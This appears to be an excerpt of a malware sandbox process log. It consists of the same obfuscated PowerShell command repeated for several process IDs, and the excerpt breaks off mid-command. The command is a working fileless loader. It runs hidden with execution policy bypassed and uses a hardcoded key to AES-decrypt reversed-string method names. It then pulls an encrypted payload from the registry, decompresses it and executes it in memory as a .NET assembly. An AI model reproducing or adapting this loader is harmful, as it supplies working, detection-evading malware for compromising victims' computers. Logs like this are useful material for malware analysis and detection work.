[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:7116
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:7296
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:1372
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:4040
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join 